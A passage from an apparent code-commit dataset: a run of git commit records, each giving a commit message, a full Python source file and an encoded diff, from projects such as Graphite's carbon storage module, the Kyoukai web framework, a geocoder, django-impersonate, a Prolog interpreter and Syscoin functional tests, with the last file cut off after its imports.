@@ -1123,24 +1123,28 @@
+
args=(pong_t
@@ -1157,32 +1157,36 @@
,))%0A
+
+
ping_thread.name
@@ -1219,32 +1219,36 @@
ng'%0A
+
ping_thread.daem
@@ -1261,32 +1261,36 @@
rue%0A
+
+
ping_thread.star
@@ -1297,24 +1297,28 @@
t()%0A
+
self._receiv
@@ -1325,24 +1325,28 @@
e()%0A
+
+
self._close(
@@ -1346,16 +1346,91 @@
_close()
+%0A except BaseException:%0A self._exception = sys.exc_info()
%0A%0A de
|
f0732e9ffd8ba84707d0805bf1b15c5ff9270971
|
Update storage.py
|
lib/carbon/storage.py
|
lib/carbon/storage.py
|
"""Copyright 2009 Chris Davis
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
import re
from os.path import join
from carbon.conf import OrderedConfigParser, settings
from carbon.exceptions import CarbonConfigException
from carbon.util import parseRetentionDef
from carbon import log, state
STORAGE_SCHEMAS_CONFIG = join(settings.CONF_DIR, 'storage-schemas.conf')
STORAGE_AGGREGATION_CONFIG = join(settings.CONF_DIR, 'storage-aggregation.conf')
STORAGE_LISTS_DIR = join(settings.CONF_DIR, 'lists')
class Schema:
def test(self, metric):
raise NotImplementedError()
def matches(self, metric):
return bool(self.test(metric))
class DefaultSchema(Schema):
def __init__(self, name, archives):
self.name = name
self.archives = archives
def test(self, metric):
return True
class PatternSchema(Schema):
def __init__(self, name, pattern, archives):
self.name = name
self.pattern = pattern
self.regex = re.compile(pattern)
self.archives = archives
def test(self, metric):
return self.regex.search(metric)
class Archive:
def __init__(self, secondsPerPoint, points):
self.secondsPerPoint = int(secondsPerPoint)
self.points = int(points)
def __str__(self):
return "Archive = (Seconds per point: %d, Datapoints to save: %d)" % (
self.secondsPerPoint, self.points)
def getTuple(self):
return (self.secondsPerPoint, self.points)
@staticmethod
def fromString(retentionDef):
(secondsPerPoint, points) = parseRetentionDef(retentionDef)
return Archive(secondsPerPoint, points)
def loadStorageSchemas():
schemaList = []
config = OrderedConfigParser()
config.read(STORAGE_SCHEMAS_CONFIG)
for section in config.sections():
options = dict(config.items(section))
pattern = options.get('pattern')
try:
retentions = options['retentions'].split(',')
except KeyError:
log.err("Schema %s missing 'retentions', skipping" % section)
continue
try:
archives = [Archive.fromString(s) for s in retentions]
except ValueError as exc:
log.err("{msg} in section [{section}] in {fn}".format(
msg=exc, section=section.title(), fn=STORAGE_SCHEMAS_CONFIG))
raise SystemExit(1)
if pattern:
mySchema = PatternSchema(section, pattern, archives)
else:
log.err("Schema %s missing 'pattern', skipping" % section)
continue
archiveList = [a.getTuple() for a in archives]
try:
if state.database is not None:
state.database.validateArchiveList(archiveList)
schemaList.append(mySchema)
except ValueError as e:
log.msg("Invalid schemas found in %s: %s" % (section, e))
schemaList.append(defaultSchema)
return schemaList
def loadAggregationSchemas():
# NOTE: This abuses the Schema classes above, and should probably be refactored.
schemaList = []
config = OrderedConfigParser()
try:
config.read(STORAGE_AGGREGATION_CONFIG)
except (IOError, CarbonConfigException):
log.msg("%s not found or wrong perms, ignoring." % STORAGE_AGGREGATION_CONFIG)
for section in config.sections():
options = dict(config.items(section))
pattern = options.get('pattern')
xFilesFactor = options.get('xfilesfactor')
aggregationMethod = options.get('aggregationmethod')
try:
if xFilesFactor is not None:
xFilesFactor = float(xFilesFactor)
if not 0 <= xFilesFactor <= 1:
raise AssertionError("xFilesFactor value out of [0,1] bounds")
if aggregationMethod is not None:
if state.database is not None:
if not aggregationMethod in state.database.aggregationMethods:
raise AssertionError("aggregationMethod not found in state.database.aggregationMethods")
except ValueError:
log.msg("Invalid schemas found in %s." % section)
continue
archives = (xFilesFactor, aggregationMethod)
if pattern:
mySchema = PatternSchema(section, pattern, archives)
else:
log.err("Section missing 'pattern': %s" % section)
continue
schemaList.append(mySchema)
schemaList.append(defaultAggregation)
return schemaList
# default retention for unclassified data (7 days of minutely data)
defaultArchive = Archive(60, 60 * 24 * 7)
defaultSchema = DefaultSchema('default', [defaultArchive])
defaultAggregation = DefaultSchema('default', (None, None))
|
Python
| 0.000001
|
@@ -4058,20 +4058,16 @@
if
-not
aggregat
@@ -4076,16 +4076,20 @@
nMethod
+not
in state
|
b7e1346306465e096f74d4e912d5a29be5ee9e93
|
Remove this todo text.
|
kyoukai/app.py
|
kyoukai/app.py
|
# Somewhere along the line, I had decided that I can't interact with others. That I have no choice but to be alone,
# but I've found a new reason to stay. It's because everyone is alone. Everyone is all alone.
# ~~~
import asyncio
import logging
from asphalt.core import Context
from kyoukai.asphalt import HTTPRequestContext
from kyoukai.blueprint import Blueprint
from werkzeug.exceptions import NotFound, MethodNotAllowed, HTTPException, InternalServerError
from werkzeug.routing import RequestRedirect
from werkzeug.wrappers import Request, Response
class Kyoukai(object):
"""
The Kyoukai type is the main part of your web application. It serves as the main container for your app.
"""
def __init__(self,
application_name: str,
*,
server_name: str = None,
**kwargs):
"""
Create the new app.
:param application_name: The name of this application. This is currently unused.
:param server_name: The server name. This can be None.
"""
self.name = application_name
self.server_name = server_name
# Try and get the loop from the keyword arguments - don't automatically perform `get_event_loop`.
self.loop = kwargs.get("loop")
if not self.loop:
self.loop = asyncio.get_event_loop()
self.logger = logging.getLogger("Kyoukai")
# Create the root blueprint.
self._root_bp = Blueprint(application_name)
@property
def root(self) -> Blueprint:
"""
:return: The root Blueprint for the routing tree.
"""
return self._root_bp
def finalize(self):
"""
Finalizes the app and blueprints.
"""
self.root.finalize()
def log_route(self, request: Request, code: int):
"""
Logs a route invocation.
:param request: The request produced.
:param code: The response code of the route.
"""
fmtted = "{} {} - {}".format(request.method, request.path, code)
self.logger.info(fmtted)
async def handle_httpexception(self, ctx: HTTPRequestContext, exception: HTTPException,
environ: dict = None) -> Response:
"""
Handle a HTTP Exception.
:param ctx: The context of the request.
:param exception: The HTTPException
:param environ: The fake WSGI environment.
:return: A :class:`werkzeug.wrappers.Response` that handles this response.
"""
# Try and load the error handler recursively from the ctx.route.blueprint.
bp = ctx.bp or self.root
error_handler = bp.get_errorhandler(exception)
if not error_handler:
# Try the root Blueprint. This may happen if the blueprint requested isn't registered properly in the
# root, for some reason.
error_handler = self.root.get_errorhandler(exception)
if not error_handler:
# Just return the Exception's get_response.
return exception.get_response(environ=environ)
else:
# Try and invoke the error handler to get the Response.
# Wrap it in the try/except, so we can handle a default one.
try:
result = await error_handler.invoke(ctx, (exception,))
except HTTPException as e:
# why tho?
result = e.get_response(environ)
except Exception as e:
result = InternalServerError.wrap(e).get_response(environ)
return result
async def process_request(self, request: Request, parent_context: Context) -> Response:
"""
Processes a Request and returns a Response object.
This is the main processing method of Kyoukai, and is meant to be used by one of the HTTP server backends,
and not by client code.
:param request:
The :class:`werkzeug.wrappers.Request` object to process.
A new HTTPContext will be provided to wrap this request inside of to client code.
:param parent_context:
The :class:`asphalt.core.Context` that is the parent context for this particular app. It will be used as
the parent for the HTTPRequestContext.
:return: A :class:`werkzeug.wrappers.Response` object that can be written to the client as a response.
"""
# Create a new HTTPRequestContext.
ctx = HTTPRequestContext(parent_context, request)
ctx.app = self
async with ctx:
# Call match on our Blueprint to find the request.
# TODO: ERROR HANDLING
try:
matched, params = self.root.match(request.environ)
except NotFound as e:
# No route matched.
self.log_route(ctx.request, 404)
return await self.handle_httpexception(ctx, e, request.environ)
except MethodNotAllowed as e:
# 405 method not allowed
self.log_route(ctx.request, 405)
return await self.handle_httpexception(ctx, e, request.environ)
except RequestRedirect as e:
# slashes etc
# user code is not allowed to handle this
self.log_route(ctx.request, 301)
return e.get_response(request.environ)
ctx.route = matched
ctx.bp = ctx.route.bp
ctx.route_args = params
result = None
# Invoke the route.
try:
result = await matched.invoke(ctx, params)
except HTTPException as e:
result = await self.handle_httpexception(ctx, e, request.environ)
except Exception as e:
self.logger.error("Unhandled exception in route function")
self.logger.exception(e)
e = InternalServerError.wrap(e)
result = await self.handle_httpexception(ctx, e, request.environ)
finally:
if result:
# edge cases
self.log_route(ctx.request, result.status_code)
# Return the new Response.
return result
|
Python
| 0.000032
|
@@ -4657,43 +4657,8 @@
st.%0A
- # TODO: ERROR HANDLING%0A
|
285d5f43b112354f1d5c05f9dd6b050e30f517e4
|
Remove country=DE parameter
|
geocoder/gisgraphy.py
|
geocoder/gisgraphy.py
|
#!/usr/bin/python
# coding: utf8
from __future__ import absolute_import
import logging
from geocoder.location import BBox
from geocoder.base import OneResult, MultipleResultsQuery
class GisgraphyResult(OneResult):
@property
def lat(self):
return self.raw.get('lat')
@property
def lng(self):
return self.raw.get('lng')
@property
def address(self):
return self.raw.get('formatedFull', '')
@property
def country(self):
return self.raw.get('countryCode', '')
@property
def state(self):
return self.raw.get('state', '')
@property
def city(self):
return self.raw.get('city', '')
@property
def street(self):
return self.raw.get('streetName', '')
@property
def housenumber(self):
return self.raw.get('houseNumber', '')
@property
def postal(self):
return self.raw.get('zipCode', '')
class GisgraphyQuery(MultipleResultsQuery):
"""
Gisgraphy REST API
=======================
API Reference
-------------
http://www.gisgraphy.com/documentation/api/
"""
provider = 'gisgraphy'
method = 'geocode'
_URL = 'https://services.gisgraphy.com/geocoding/'
_RESULT_CLASS = GisgraphyResult
_KEY_MANDATORY = False
def _build_params(self, location, provider_key, **kwargs):
return {
'address': location,
'to': kwargs.get('maxRows', 1),
'format': 'json',
'country': 'DE',
}
def _adapt_results(self, json_response):
return json_response['result']
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
g = GisgraphyQuery('Ottawa Ontario', maxRows=3)
g.debug()
|
Python
| 0.00039
|
@@ -1495,37 +1495,8 @@
n',%0A
- 'country': 'DE',%0A
|
9f725eae63a7851498a82d3bc06414dc788c0ed7
|
Update comment style in admin.py
|
impersonate/admin.py
|
impersonate/admin.py
|
# -*- coding: utf-8 -*-
'''Admin models for impersonate app.'''
import logging
from django.conf import settings
from django.contrib import admin
from .models import ImpersonationLog
logger = logging.getLogger(__name__)
MAX_FILTER_SIZE = getattr(settings, 'IMPERSONATE_MAX_FILTER_SIZE', 100)
def friendly_name(user):
'''Return proper name if exists, else username.'''
if user.get_full_name() != '':
return user.get_full_name()
else:
return user.username
class SessionStateFilter(admin.SimpleListFilter):
'''Custom admin filter based on the session state.
Provides two filter values - 'complete' and 'incomplete'. A session
that has no session_ended_at timestamp is considered incomplete. This
field is set from the session_end signal receiver.
'''
title = 'session state'
parameter_name = 'session'
def lookups(self, request, model_admin):
return (
('incomplete', "Incomplete"),
('complete', "Complete")
)
def queryset(self, request, queryset):
if self.value() == 'incomplete':
return queryset.filter(session_ended_at__isnull=True)
if self.value() == 'complete':
return queryset.filter(session_ended_at__isnull=False)
else:
return queryset
class ImpersonatorFilter(admin.SimpleListFilter):
'''Custom admin filter based on the impersonator.
Provides a set of users who have impersonated at some point. It is
assumed that this is a small list of users - a subset of staff and
superusers. There is no corresponding filter for users who have been
impersonated, as this could be a very large set of users.
If the number of unique impersonators exceeds MAX_FILTER_SIZE, then
the filter is removed (shows only 'All').
'''
title = 'impersonator'
parameter_name = 'impersonator'
def lookups(self, request, model_admin):
'''Return list of unique users who have been an impersonator.'''
# the queryset containing the ImpersonationLog objects
qs = model_admin.get_queryset(request).order_by('impersonator__first_name')
# dedupe the impersonators
impersonators = set([q.impersonator for q in qs])
if len(impersonators) > MAX_FILTER_SIZE:
logger.debug(
"Hiding admin list filter as number of impersonators "
"exceeds MAX_FILTER_SIZE [%s]",
len(impersonators),
MAX_FILTER_SIZE
)
return
for i in impersonators:
yield (i.id, friendly_name(i))
def queryset(self, request, queryset):
if self.value() in (None, ''):
return queryset
else:
return queryset.filter(impersonator_id=self.value())
class ImpersonationLogAdmin(admin.ModelAdmin):
list_display = (
'impersonator_',
'impersonating_',
'session_key',
'session_started_at',
'duration'
)
readonly_fields = (
'impersonator',
'impersonating',
'session_key',
'session_started_at',
'session_ended_at',
'duration'
)
list_filter = (SessionStateFilter, ImpersonatorFilter, 'session_started_at')
def impersonator_(self, obj):
return friendly_name(obj.impersonator)
def impersonating_(self, obj):
return friendly_name(obj.impersonating)
admin.site.register(ImpersonationLog, ImpersonationLogAdmin)
|
Python
| 0
|
@@ -533,32 +533,33 @@
ilter):%0A%0A '''
+
Custom admin fil
@@ -591,16 +591,20 @@
state.%0A%0A
+
Prov
@@ -656,16 +656,24 @@
mplete'.
+%0A
A sessi
@@ -674,20 +674,16 @@
session
-%0A
that ha
@@ -716,16 +716,24 @@
stamp is
+%0A
conside
@@ -752,20 +752,16 @@
te. This
-%0A
field i
@@ -770,24 +770,32 @@
set from the
+%0A
session_end
@@ -1392,16 +1392,17 @@
%0A '''
+
Custom a
@@ -1437,24 +1437,28 @@
ersonator.%0A%0A
+
Provides
@@ -1513,18 +1513,22 @@
int.
+%0A
It is
-%0A
ass
@@ -1577,16 +1577,24 @@
a subset
+%0A
of staf
@@ -1598,20 +1598,16 @@
taff and
-%0A
superus
@@ -1643,16 +1643,24 @@
g filter
+%0A
for use
@@ -1675,20 +1675,16 @@
ave been
-%0A
imperso
@@ -1708,16 +1708,24 @@
uld be a
+%0A
very la
@@ -1747,16 +1747,20 @@
s.%0A %0A
+
If t
@@ -1821,17 +1821,21 @@
IZE,
+%0A
then
-%0A
the
|
951214d00e29fff46fe9294dadea1b7587db564f
|
fix dangerous bug about var representation on the console which led to non-backtracked path compression
|
prolog/interpreter/translatedmain.py
|
prolog/interpreter/translatedmain.py
|
import os, sys
from pypy.rlib.parsing.parsing import ParseError
from pypy.rlib.parsing.deterministic import LexerError
from prolog.interpreter.interactive import helptext, StopItNow, \
ContinueContinuation
from prolog.interpreter.parsing import parse_file, get_query_and_vars
from prolog.interpreter.parsing import get_engine
from prolog.interpreter.continuation import Continuation, Engine, DoneContinuation
from prolog.interpreter import error, term
import prolog.interpreter.term
prolog.interpreter.term.DEBUG = False
class ContinueContinuation(Continuation):
def __init__(self, engine, var_to_pos, write):
Continuation.__init__(self, engine, DoneContinuation(engine))
self.var_to_pos = var_to_pos
self.write = write
def activate(self, fcont, heap):
self.write("yes\n")
var_representation(self.var_to_pos, self.engine, self.write)
while 1:
if isinstance(fcont, DoneContinuation):
self.write("\n")
return DoneContinuation(None), fcont, heap
res = getch()
if res in "\r\x04\n":
self.write("\n")
raise StopItNow()
if res in ";nr":
raise error.UnificationFailed
elif res in "h?":
self.write(helptext)
elif res in "p":
var_representation(self.var_to_pos, self.engine, self.write)
else:
self.write('unknown action. press "h" for help\n')
def var_representation(var_to_pos, engine, write):
from prolog.builtin import formatting
f = formatting.TermFormatter(engine, quoted=True, max_depth=20)
for var, real_var in var_to_pos.iteritems():
if var.startswith("_"):
continue
val = f.format(real_var.getvalue(engine.heap))
write("%s = %s\n" % (var, val))
def getch():
line = readline()
return line[0]
def debug(msg):
os.write(2, "debug: " + msg + '\n')
def printmessage(msg):
os.write(1, msg)
def readline():
result = []
while 1:
s = os.read(0, 1)
result.append(s)
if s == "\n":
break
if s == '':
if len(result) > 1:
break
raise SystemExit
return "".join(result)
def run(query, var_to_pos, engine):
from prolog.builtin import formatting
f = formatting.TermFormatter(engine, quoted=True, max_depth=20)
try:
if query is None:
return
engine.run(query, ContinueContinuation(engine, var_to_pos, printmessage))
except error.UnificationFailed:
printmessage("no\n")
except error.UncaughtError, e:
f._make_reverse_op_mapping()
printmessage("ERROR: ")
t = e.term
if isinstance(t, term.Callable):
errorterm = t.argument_at(0)
if isinstance(errorterm, term.Callable):
if errorterm.name() == "instantiation_error":
printmessage("arguments not sufficiently instantiated\n")
return
elif errorterm.name()== "existence_error":
if isinstance(errorterm, term.Callable):
printmessage("Undefined %s: %s\n" % (
f.format(errorterm.argument_at(0)),
f.format(errorterm.argument_at(1))))
return
elif errorterm.name()== "domain_error":
if isinstance(errorterm, term.Callable):
printmessage(
"Domain error: '%s' expected, found '%s'\n" % (
f.format(errorterm.argument_at(0)),
f.format(errorterm.argument_at(1))))
return
elif errorterm.name()== "type_error":
if isinstance(errorterm, term.Callable):
printmessage(
"Type error: '%s' expected, found '%s'\n" % (
f.format(errorterm.argument_at(0)),
f.format(errorterm.argument_at(1))))
return
# except error.UncatchableError, e:
# printmessage("INTERNAL ERROR: %s\n" % (e.message, ))
except StopItNow:
printmessage("yes\n")
def repl(engine):
printmessage("welcome!\n")
while 1:
printmessage(">?- ")
line = readline()
if line == "halt.\n":
break
try:
goals, var_to_pos = engine.parse(line)
except ParseError, exc:
printmessage(exc.nice_error_message("<stdin>", line) + "\n")
continue
except LexerError, exc:
printmessage(exc.nice_error_message("<stdin>") + "\n")
continue
for goal in goals:
run(goal, var_to_pos, engine)
def execute(e, filename):
e.run(term.Callable.build("consult", [term.Callable.build(filename)]))
if __name__ == '__main__':
from sys import argv
e = Engine()
if len(argv) == 2:
execute(e, argv[1])
repl(e)
|
Python
| 0
|
@@ -867,32 +867,38 @@
gine, self.write
+, heap
)%0A while
@@ -1417,16 +1417,22 @@
lf.write
+, heap
)%0A
@@ -1571,24 +1571,30 @@
ngine, write
+, heap
):%0A from
@@ -1837,23 +1837,16 @@
etvalue(
-engine.
heap))%0A
|
6d9efe005e346aaef359f369c89d007da1b83189
|
add more untested changes for slack integration
|
lampeflaske.py
|
lampeflaske.py
|
#!/usr/bin/env python3
import pprint
import os
import lamper
from flask import Flask, request
from flask_api import status
app = Flask(__name__)
@app.route("/", methods=['POST', 'GET'])
def hello():
pprint.pprint(request.form)
if request.form.get('command') != '/lamper':
return "wrong command" , status.HTTP_400_BAD_REQUEST
if request.form.get('team_id') != os.environ['SLACK_TEAMID']:
return "wrong team id" , status.HTTP_403_FORBIDDEN
if request.form.get('token') != os.environ['SLACK_TOKEN']:
return "wrong token", status.HTTP_403_FORBIDDEN
if request.form.get('channel_id') != os.environ['SLACK_CHANNELID']:
return "wrong channel id", status.HTTP_403_FORBIDDEN
if request.form.get('text') not in lamper.colors.keys():
return "wrong color" , status.HTTP_400_BAD_REQUEST
lamper.set_dmx(lamper.colors[request.form.get('text')])
#return "Hello World! " + request.form.get('text')
return """
{
"response_type": "in_channel",
"text": "Light switched to {}",
"attachments": [
{
"text":"Light switched to {}"
}
]
}
""".format(request.form.get('text'))
|
Python
| 0
|
@@ -89,16 +89,25 @@
request
+, jsonify
%0Afrom fl
@@ -977,29 +977,22 @@
r
-eturn %22%22%22
+ = %7B
%0A
-%7B%0A
-%22
+'
resp
@@ -1000,20 +1000,20 @@
nse_type
-%22: %22
+': '
in_chann
@@ -1018,153 +1018,49 @@
nnel
-%22
+'
,%0A
-%22text%22: %22Light switched to %7B%7D%22,%0A %22attachments%22: %5B%0A %7B%0A %22text%22:%22Light switched to %7B%7D%22%0A %7D%0A %5D%0A %7D%0A %22%22%22
+ 'text': 'Light switched to %7B%7D'
.for
@@ -1088,9 +1088,39 @@
'text'))
+,%0A %7D%0A%0A return jsonify(r)
%0A
|
70aab65ba167cfd4e24452ca7dd03fe1cabaf6a1
|
create block on node2
|
test/functional/feature_asset_reorg.py
|
test/functional/feature_asset_reorg.py
|
#!/usr/bin/env python3
# Copyright (c) 2019-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error, disconnect_nodes, connect_nodes
class AssetReOrgTest(SyscoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [['-assetindex=1'],['-assetindex=1'],['-assetindex=1']]
def run_test(self):
self.nodes[0].generate(1)
self.sync_blocks()
self.nodes[2].generate(200)
self.sync_blocks()
disconnect_nodes(self.nodes[0], 1)
disconnect_nodes(self.nodes[0], 2)
self.basic_asset()
# create fork
self.nodes[0].generate(11)
# won't exist on node 0 because it was created on node 3 and we are disconnected
assert_raises_rpc_error(-20, 'Failed to read from asset DB', self.nodes[0].assetinfo, self.asset)
self.nodes[2].generate(10)
assetInfo = self.nodes[2].assetinfo(self.asset)
assert_equal(assetInfo['asset_guid'], self.asset)
# still won't exist on node 0 yet
assert_raises_rpc_error(-20, 'Failed to read from asset DB', self.nodes[0].assetinfo, self.asset)
# connect and sync to longest chain now which does not include the asset
connect_nodes(self.nodes[0], 1)
connect_nodes(self.nodes[0], 2)
self.sync_blocks()
assert_raises_rpc_error(-20, 'Failed to read from asset DB', self.nodes[0].assetinfo, self.asset)
assert_raises_rpc_error(-20, 'Failed to read from asset DB', self.nodes[1].assetinfo, self.asset)
assert_raises_rpc_error(-20, 'Failed to read from asset DB', self.nodes[2].assetinfo, self.asset)
self.nodes[0].generate(1)
self.sync_blocks()
# asset is there now
assetInfo = self.nodes[0].assetinfo(self.asset)
assert_equal(assetInfo['asset_guid'], self.asset)
assetInfo = self.nodes[1].assetinfo(self.asset)
assert_equal(assetInfo['asset_guid'], self.asset)
assetInfo = self.nodes[2].assetinfo(self.asset)
assert_equal(assetInfo['asset_guid'], self.asset)
def basic_asset(self):
self.asset = self.nodes[2].assetnew('1', 'TST', 'asset description', '0x', 8, '1000', '10000', 31, {})['asset_guid']
if __name__ == '__main__':
AssetReOrgTest().main()
|
Python
| 0.000002
|
@@ -980,17 +980,17 @@
on node
-3
+2
and we
@@ -1907,32 +1907,88 @@
fo, self.asset)%0A
+ # node 2 should have the asset in mempool again%0A
self.nod
@@ -1982,33 +1982,33 @@
self.nodes%5B
-0
+2
%5D.generate(1)%0A
|
1f9dea20b433e5b2a69f348d1a842d71a99bc56e
|
Modify tests
|
tests/chainerx_tests/unit_tests/routines_tests/test_evaluation.py
|
tests/chainerx_tests/unit_tests/routines_tests/test_evaluation.py
|
import chainer
from chainer import functions as F
import numpy
import chainerx
from chainerx_tests import dtype_utils
from chainerx_tests import op_utils
_in_out_eval_dtypes = dtype_utils._permutate_dtype_mapping([
(('float16', 'float16'), 'float16'),
(('float32', 'float32'), 'float32'),
(('float64', 'float64'), 'float64'),
(('float32', 'float16'), 'float32'),
(('float64', 'float16'), 'float64'),
(('float64', 'float32'), 'float64'),
])
class EvalBase(op_utils.ChainerOpTest):
def generate_inputs(self):
x_dtype, t_dtype = self.in_dtypes
y = numpy.random.uniform(-1, 1, self.x_shape).astype(x_dtype)
targ = numpy.random.randint(
3, size=self.t_shape).astype(t_dtype)
return y, targ
def forward_chainerx(self, inputs):
return self.forward_xp(inputs, chainerx)
def forward_chainer(self, inputs):
return self.forward_xp(inputs, F)
def forward_xp(self, inputs, xp):
raise NotImplementedError(
'Op test implementation must override `forward_xp`.')
@op_utils.op_test(['native:0', 'cuda:0'])
@chainer.testing.parameterize(*(
chainer.testing.product([
chainer.testing.from_pytest_parameterize(
'x_shape,t_shape', [
((10, 3), (10,)),
((10, 3, 1), (10,)),
((10, 3, 1, 1), (10,)),
((10, 3, 5), (10, 5)),
((10, 3, 5, 4), (10, 5, 4)),
((10, 3, 5, 4, 1), (10, 5, 4)),
((10, 3, 5, 4, 1, 1), (10, 5, 4))
]),
chainer.testing.from_pytest_parameterize(
'in_dtypes,out_dtype', _in_out_eval_dtypes),
chainer.testing.from_pytest_parameterize(
'ignore_label', [None, 0])
])
))
class TestAccuracy(EvalBase):
def forward_xp(self, inputs, xp):
x, t = inputs
t = t.astype(numpy.int64)
if xp is chainerx:
out = xp.accuracy(x, t, self.ignore_label)
else:
out = xp.accuracy(x, t, self.ignore_label)
return out,
|
Python
| 0.000001
|
@@ -177,45 +177,8 @@
s =
-dtype_utils._permutate_dtype_mapping(
%5B%0A
@@ -189,28 +189,26 @@
'float16', '
-floa
+in
t16'), 'floa
@@ -208,18 +208,18 @@
, 'float
-16
+32
'),%0A
@@ -228,28 +228,26 @@
'float32', '
-floa
+in
t32'), 'floa
@@ -271,20 +271,18 @@
at64', '
-floa
+in
t64'), '
@@ -306,28 +306,26 @@
'float32', '
-floa
+in
t16'), 'floa
@@ -349,20 +349,18 @@
at64', '
-floa
+in
t16'), '
@@ -388,20 +388,18 @@
at64', '
-floa
+in
t32'), '
@@ -410,17 +410,16 @@
t64'),%0A%5D
-)
%0A%0A%0Aclass
@@ -1819,142 +1819,8 @@
uts%0A
- t = t.astype(numpy.int64)%0A if xp is chainerx:%0A out = xp.accuracy(x, t, self.ignore_label)%0A else:%0A
|
8c6ffc4e1ed6b7a7f0c3cd4cd28234541bbf91a0
|
Add test for missing testnet section in conf file
|
test/functional/feature_config_args.py
|
test/functional/feature_config_args.py
|
#!/usr/bin/env python3
# Copyright (c) 2017-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test various command line arguments and configuration file parameters."""
import os
from test_framework.test_framework import BitcoinTestFramework
class ConfArgsTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def test_config_file_parser(self):
# Assume node is stopped
inc_conf_file_path = os.path.join(self.nodes[0].datadir, 'include.conf')
with open(os.path.join(self.nodes[0].datadir, 'bitcoin.conf'), 'a', encoding='utf-8') as conf:
conf.write('includeconf={}\n'.format(inc_conf_file_path))
with open(inc_conf_file_path, 'w', encoding='utf-8') as conf:
conf.write('-dash=1\n')
self.nodes[0].assert_start_raises_init_error(expected_msg='Error reading configuration file: parse error on line 1: -dash=1, options in configuration file must be specified without leading -')
with open(inc_conf_file_path, 'w', encoding='utf-8') as conf:
conf.write('nono\n')
self.nodes[0].assert_start_raises_init_error(expected_msg='Error reading configuration file: parse error on line 1: nono, if you intended to specify a negated option, use nono=1 instead')
with open(inc_conf_file_path, 'w', encoding='utf-8') as conf:
conf.write('server=1\nrpcuser=someuser\nrpcpassword=some#pass')
self.nodes[0].assert_start_raises_init_error(expected_msg='Error reading configuration file: parse error on line 3, using # in rpcpassword can be ambiguous and should be avoided')
with open(inc_conf_file_path, 'w', encoding='utf-8') as conf:
conf.write('server=1\nrpcuser=someuser\nmain.rpcpassword=some#pass')
self.nodes[0].assert_start_raises_init_error(expected_msg='Error reading configuration file: parse error on line 3, using # in rpcpassword can be ambiguous and should be avoided')
with open(inc_conf_file_path, 'w', encoding='utf-8') as conf:
conf.write('server=1\nrpcuser=someuser\n[main]\nrpcpassword=some#pass')
self.nodes[0].assert_start_raises_init_error(expected_msg='Error reading configuration file: parse error on line 4, using # in rpcpassword can be ambiguous and should be avoided')
inc_conf_file2_path = os.path.join(self.nodes[0].datadir, 'include2.conf')
with open(os.path.join(self.nodes[0].datadir, 'bitcoin.conf'), 'a', encoding='utf-8') as conf:
conf.write('includeconf={}\n'.format(inc_conf_file2_path))
with open(inc_conf_file_path, 'w', encoding='utf-8') as conf:
conf.write('testnot.datadir=1\n')
with open(inc_conf_file2_path, 'w', encoding='utf-8') as conf:
conf.write('[testnet]\n')
self.restart_node(0)
self.nodes[0].stop_node(expected_stderr='Warning: ' + inc_conf_file_path + ':1 Section [testnot] is not recognized.' + os.linesep + 'Warning: ' + inc_conf_file2_path + ':1 Section [testnet] is not recognized.')
with open(inc_conf_file_path, 'w', encoding='utf-8') as conf:
conf.write('') # clear
with open(inc_conf_file2_path, 'w', encoding='utf-8') as conf:
conf.write('') # clear
def run_test(self):
self.stop_node(0)
self.test_config_file_parser()
# Remove the -datadir argument so it doesn't override the config file
self.nodes[0].args = [arg for arg in self.nodes[0].args if not arg.startswith("-datadir")]
default_data_dir = self.nodes[0].datadir
new_data_dir = os.path.join(default_data_dir, 'newdatadir')
new_data_dir_2 = os.path.join(default_data_dir, 'newdatadir2')
# Check that using -datadir argument on non-existent directory fails
self.nodes[0].datadir = new_data_dir
self.nodes[0].assert_start_raises_init_error(['-datadir=' + new_data_dir], 'Error: Specified data directory "' + new_data_dir + '" does not exist.')
# Check that using non-existent datadir in conf file fails
conf_file = os.path.join(default_data_dir, "peercoin.conf")
# datadir needs to be set before [regtest] section
conf_file_contents = open(conf_file, encoding='utf8').read()
with open(conf_file, 'w', encoding='utf8') as f:
f.write("datadir=" + new_data_dir + "\n")
f.write(conf_file_contents)
# Temporarily disabled, because this test would access the user's home dir (~/.bitcoin)
#self.nodes[0].assert_start_raises_init_error(['-conf=' + conf_file], 'Error reading configuration file: specified data directory "' + new_data_dir + '" does not exist.')
# Create the directory and ensure the config file now works
os.mkdir(new_data_dir)
# Temporarily disabled, because this test would access the user's home dir (~/.bitcoin)
#self.start_node(0, ['-conf='+conf_file, '-wallet=w1'])
#self.stop_node(0)
#assert os.path.exists(os.path.join(new_data_dir, 'regtest', 'blocks'))
#if self.is_wallet_compiled():
#assert os.path.exists(os.path.join(new_data_dir, 'regtest', 'wallets', 'w1'))
# Ensure command line argument overrides datadir in conf
os.mkdir(new_data_dir_2)
self.nodes[0].datadir = new_data_dir_2
self.start_node(0, ['-datadir='+new_data_dir_2, '-conf='+conf_file, '-wallet=w2'])
assert os.path.exists(os.path.join(new_data_dir_2, 'regtest', 'blocks'))
if self.is_wallet_compiled():
assert os.path.exists(os.path.join(new_data_dir_2, 'regtest', 'wallets', 'w2'))
if __name__ == '__main__':
ConfArgsTest().main()
|
Python
| 0
|
@@ -1132,24 +1132,295 @@
eading -')%0A%0A
+ with open(inc_conf_file_path, 'w', encoding='utf8') as conf:%0A conf.write(%22wallet=foo%5Cn%22)%0A self.nodes%5B0%5D.assert_start_raises_init_error(expected_msg='Error: Config setting for -wallet only applied on regtest network when in %5Bregtest%5D section.')%0A%0A
with
|
67adba196ed29a2a17911e154dc814dae89953ec
|
Correct log level choices
|
coalib/parsing/DefaultArgParser.py
|
coalib/parsing/DefaultArgParser.py
|
import argparse
from coalib.misc.i18n import _
